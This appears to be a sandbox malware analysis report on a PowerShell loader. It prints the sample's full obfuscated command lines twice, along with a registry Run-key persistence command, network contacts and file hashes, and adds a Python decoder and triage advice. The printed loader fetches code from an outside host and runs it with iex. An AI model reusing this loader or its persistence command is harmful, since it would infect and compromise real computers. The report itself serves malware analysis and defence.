"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
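The PowerShell command line above is self-decoding: the function named Acarpelous takes each string literal, walks it from index 5 in steps of 6 (stopping one character before the end, since $Oisen is Length-1), and keeps only the character at each position; the other five characters of every 6-byte chunk are filler. The function named Sulfide dot-sources the result through Invoke-Expression ($Rorgngeres204 decodes to "iex"). The following decoder is an added example written for this report, not code from the sandbox or from the sample. The sample literals it carries are copied from the command line above; the decoder name, the start offset and the stride are parameters because each build of this loader uses a different random word and may shift the scheme.

```python
import re

# Parameters of the scheme used by this sample: keep blob[5], blob[11], blob[17], ...
# and stop before the last character, exactly as the PowerShell loop does:
#   For($i=5; $i -lt $blob.Length-1; $i+=6) { $out += $blob.Substring($i, 1) }
DEFAULT_START = 5
DEFAULT_STRIDE = 6


def decode(blob: str, start: int = DEFAULT_START, stride: int = DEFAULT_STRIDE) -> str:
    """Recover the plaintext hidden in one obfuscated string literal.

    The upper bound len(blob) - 1 reproduces the loader's off-by-one: every
    literal ends in a throw-away filler character (a trailing space here).
    """
    return "".join(blob[i] for i in range(start, len(blob) - 1, stride))


def extract_literals(cmdline: str, decoder_name: str = "Acarpelous") -> list[str]:
    """Return the raw single-quoted arguments passed to the decoder function.

    PowerShell escapes a literal quote inside single quotes by doubling it,
    so the pattern accepts '' and the replace un-doubles it afterwards.
    """
    pattern = re.compile(re.escape(decoder_name) + r"\s+'((?:[^']|'')*)'")
    return [m.group(1).replace("''", "'") for m in pattern.finditer(cmdline)]


def decode_cmdline(cmdline: str, decoder_name: str = "Acarpelous") -> list[str]:
    """Decode every decoder call found in a captured command line, in order."""
    return [decode(s) for s in extract_literals(cmdline, decoder_name)]


# Constructed sample: four literals copied from the powershell.exe command line
# in this report. They contain no runs of spaces, so the rendered page did not
# damage their alignment; the User-Agent literal for example survives intact.
SAMPLE_CMDLINE = (
    "$Romanbladsstil199=Acarpelous 'Non.n>Reall ';"
    "$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';"
    "$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';"
    r"$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';"
)


if __name__ == "__main__":
    # Prints the variable assignments' decoded values: '>', 'iex', 'User-Agent'
    # and the cmd.exe line that the report shows as a child process.
    for plaintext in decode_cmdline(SAMPLE_CMDLINE):
        print(repr(plaintext))
```

Feed the decoder the command line from a raw source (the sandbox's JSON export, or Sysmon event ID 1 / Security event 4688 from the host), not the text as rendered on this page: HTML rendering collapses runs of spaces, and a lost space shifts every following chunk by one and corrupts the output. Decoded in full from the raw line, $Illumination is a Firefox-style User-Agent string, $Prominences is an https URL on www.innovativebuildingsolutions.in (the host in the Network table below), and $Springdanses is the "echo %appdata%\Skrmet.Kli && echo t" cmd.exe command seen as a child process. For the persistence, note that the Run value is REG_EXPAND_SZ, so %Rundsavsbladene% is expanded at logon and the next stage is read from HKCU\Codebtors, value Typeregningens; both locations are worth collecting when triaging a host.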
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.innovativebuildingsolutions.in | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
Files
memory/2156-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp
memory/2156-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/2156-6-0x00000000027A0000-0x00000000027A8000-memory.dmp
memory/2156-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2156-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2156-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2156-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J4520554E2X6SS5OMAQ.temp
| MD5 | a827ff99cbccfab8cc86b1c1fecc9021 |
| SHA1 | 911690184d451687ed5fa08601a9b93387ac97b5 |
| SHA256 | 262b2a2744c9e11590a9659239470480c3f690ade183679cb9914a9e4cc88594 |
| SHA512 | 9e89423da63c455fe9d5ed715f8dd917826a849f372b09546473593efe117b7719aeb5fab180d0ed0ec1ee4495ef2717e460b21c7a453d0273c2bcd4b6e0179f |
C:\Users\Admin\AppData\Roaming\Skrmet.Kli
| MD5 | 9916e5a5f7afe8c1f861f93999a875f3 |
| SHA1 | 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc |
| SHA256 | 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df |
| SHA512 | 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc |
memory/2156-16-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/1964-17-0x0000000006680000-0x000000000A2DC000-memory.dmp
memory/2156-18-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp
memory/2112-32-0x0000000000AC0000-0x0000000001B22000-memory.dmp
memory/2156-33-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2112-34-0x0000000000AC0000-0x0000000000B00000-memory.dmp